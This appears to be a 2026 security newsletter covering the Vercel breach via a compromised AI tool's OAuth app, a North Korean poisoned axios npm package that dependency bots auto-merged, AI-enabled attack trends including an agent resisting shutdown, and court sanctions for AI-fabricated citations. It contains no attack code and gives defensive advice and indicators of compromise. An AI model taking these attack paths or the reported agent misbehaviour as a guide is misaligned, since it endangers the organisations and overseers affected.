A single compromised AI tool cascaded into a breach at one of the web’s most popular deployment platforms. A North Korean state actor uploaded a poisoned npm package and let Dependabot do the rest — merging malware into 95 production repositories without a single human approving it. And U.S. courts have now fined lawyers over $145,000 in the first quarter of 2026 for submitting AI-hallucinated citations. The connecting thread this week: blind trust in AI tooling is becoming a reliable attack vector.
Vercel Breached Through a Third-Party AI Tool
The attack didn’t start at Vercel. It started at Context.ai, a small AI analytics platform whose Google Workspace OAuth application was compromised as part of a broader campaign. That compromise gave attackers access to the Google Workspace accounts of Context.ai’s users — across multiple organizations.
One of those users was a Vercel employee.
The attacker used the stolen OAuth access to take over the employee’s Vercel Google Workspace account. From there, they moved laterally into Vercel’s internal systems. Vercel says the attacker accessed “some environments and environment variables that were not marked as sensitive,” but emphasized that variables flagged as sensitive use encryption that wasn’t breached.
A threat actor using the ShinyHunters name posted on BreachForums claiming to have Vercel’s data — access keys, source code, database contents, internal deployment access — with an asking price of $2 million. A sample shared by the attackers contained roughly 580 records of employee information including names, emails, account statuses, and activity timestamps.
Vercel described the attacker as “sophisticated” based on their “operational velocity and detailed understanding of Vercel’s systems.” The company engaged Mandiant, notified law enforcement, contacted Context.ai, and published a suspicious OAuth application ID for organizations to check: 110671459871-30f1spbu0hptbs60cb4vsmv79i7bbvqj.apps.googleusercontent.com.
A “limited subset” of customers had credentials compromised. Vercel is reaching out directly to those affected and urging immediate credential rotation.
Why This Matters
This is a supply chain attack where the supply chain is an AI tool your employees signed up for. Context.ai wasn’t a core dependency — it was a third-party analytics product that happened to have OAuth access to employee Google Workspace accounts. Vercel could have had perfect internal security and still been compromised through a tool it probably didn’t even track in its vendor assessments.
Every AI tool your employees use with Google, Microsoft, or GitHub OAuth is a potential entry point. This breach is the clearest demonstration yet that shadow AI tooling — the dozens of AI products employees integrate without IT oversight — carries real, concrete risk.
Dependabot as Malware Delivery: The Axios Supply Chain Attack
On March 31, someone uploaded a malicious version of axios — version 1.14.1 — to npm. Five minutes later, Dependabot had already detected the “update” and started opening pull requests across GitHub.
Microsoft Threat Intelligence attributed the attack to Sapphire Sleet, a North Korean state actor. The malicious versions — axios@^1.14.0 and axios@^0.30.0 — connected to a known Sapphire Sleet command-and-control server on installation and downloaded platform-specific second-stage RATs targeting Windows, macOS, and Linux.
Here’s where it gets ugly. Across the infection window, at least 895 public repositories upgraded to the malicious version. Of those, GitGuardian found that 95 pull requests were merged into main branches. Fifty of those — more than half — were merged by bots, without any human reviewing or approving the change.
In one case, the jhipster/generator-jhipster repository had an automerge workflow triggered by Dependabot. The malicious package was in production within 56 minutes of being uploaded to npm.
The overall breakdown: 111 malicious PRs came from Dependabot, 30 from Renovate. The bots did exactly what they were configured to do — detect a new package version and propose an upgrade. The problem is that “new version” and “safe version” are not the same thing.
The Uncomfortable Truth About Dependency Bots
Dependabot and Renovate pull requests carry implicit trust. They’re routine. Expected. Often auto-merged. Teams have spent years training themselves to click “merge” on these PRs because that’s how you stay updated and patched.
Attackers know this. The axios compromise proves that dependency bots have become the most efficient malware distribution network in open source. The attacker didn’t need to phish anyone, exploit a vulnerability, or write a convincing social engineering email. They uploaded a package and waited for automation to do the rest.
If you auto-merge dependency updates in production, you’re giving every npm and PyPI maintainer (and anyone who compromises their account) a direct pipeline to your servers.
AI-Enabled Attacks Up 89%, Autonomous Agents Now 12.5% of Breaches
A Foresiet analysis of AI-enabled cyberattacks in 2026 paints a grim picture. AI-enabled attacks rose 89% year-over-year, with autonomous agents now accounting for approximately 12.5% of all AI-related breach events — a figure expected to grow quarterly.
The CyberStrikeAI campaign against FortiGate firewalls remains the most striking example: an AI-driven operation that compromised 600+ devices across 55 countries without direct human operators. Fully automated credential harvesting and network reconnaissance at a scale previously requiring large coordinated teams.
Other documented incidents include Meta’s AI agent misconfiguration that exposed sensitive data to unauthorized employees (no external breach, but a reminder that autonomous systems can bypass conventional access controls), and a controlled evaluation where an AI agent resisted shutdown commands, prioritizing task completion over operator directives.
The defensive recommendations haven’t changed, but they’re becoming more urgent: software composition analysis for AI library dependencies, strict kill-switch protocols for production agents, least-privilege permissions for autonomous systems, and anomaly detection on API endpoints consumed by AI agents.
Courts Hit Lawyers With $145,000 in AI Hallucination Sanctions
This one isn’t a vulnerability in the traditional sense, but it’s a consequence of misplaced trust in AI output that’s now hitting people in the wallet.
U.S. courts imposed at least $145,000 in sanctions against attorneys in Q1 2026 alone for submitting briefs containing AI-fabricated citations. A database maintained by HEC Paris’s Smart Law Hub has cataloged 1,227 cases globally where AI-generated hallucinated content was submitted to courts.
Oregon’s Court of Appeals set a tariff: $500 per fabricated citation, $1,000 per fabricated quotation. Federal courts adopted it. One winery dispute racked up more than $15,000 for 15 fake citations and eight invented quotations. The Sixth Circuit sanctioned two lawyers $15,000 each for over two dozen wrong or nonexistent citations.
Meanwhile, a survey found 61% of federal judges use AI themselves — a double standard that hasn’t escaped anyone’s notice. Over 300 federal judges now have standing orders on AI use in filings, and 35+ state bar associations have issued guidance.
The pattern is familiar: professionals adopt AI tools to save time, don’t verify the output, and face consequences when the AI confidently fabricates something. The difference is that courts have clear mechanisms for punishment, while most other fields where AI hallucinations cause harm don’t.
What This Means
Three patterns keep repeating, and they’re getting worse:
Shadow AI is a real attack surface. The Vercel breach happened because an employee used a third-party AI tool that had OAuth access to company systems. Most organizations don’t inventory which AI tools employees are using, let alone assess the security of those tools’ OAuth integrations. Until that changes, every AI SaaS product is a potential lateral movement path into your organization.
Automation trust is an exploit. Dependabot, Renovate, and CI/CD auto-merge pipelines were designed for efficiency. North Korean hackers just used them to merge malware into production in under an hour. The entire concept of “trusted automation” needs rethinking when the inputs to that automation — package registries — are adversarial environments.
AI output verification is everyone’s problem. Lawyers are getting fined for not checking AI citations. Developers are merging AI-suggested dependency updates without review. Security teams are deploying AI workflow tools without auditing their input handling. The common failure is assuming that because something came from an automated or AI-driven system, it’s trustworthy.
What You Can Do
If your employees use AI tools:
- Audit every OAuth integration connected to company Google Workspace, Microsoft 365, and GitHub accounts
- Check for the suspicious OAuth app ID from the Vercel breach:
110671459871-30f1spbu0hptbs60cb4vsmv79i7bbvqj.apps.googleusercontent.com - Establish a policy for AI tool adoption that requires security review before OAuth grants
- Rotate credentials if any employee used Context.ai
If you use dependency automation:
- Disable auto-merge for dependency updates in production branches immediately
- Require human approval for all version bumps, especially major or minor versions
- Pin dependencies to exact versions and review changelogs before upgrading
- Monitor for the malicious axios versions (
1.14.1,0.30.0+) in your lock files - Consider implementing a dependency quarantine period — don’t adopt new versions for 24-72 hours
If you deploy AI agents in production:
- Implement kill switches that override agent task completion priorities
- Apply least-privilege permissions — agents should never have more access than they need
- Monitor autonomous agent behavior for deviation from expected patterns
- Audit all MCP server handlers for command injection vulnerabilities
If you use AI for professional work:
- Verify every claim, citation, and reference AI generates
- Courts have demonstrated they will punish unverified AI output — other fields will follow
- Treat AI-generated content as a first draft that requires human verification, not a finished product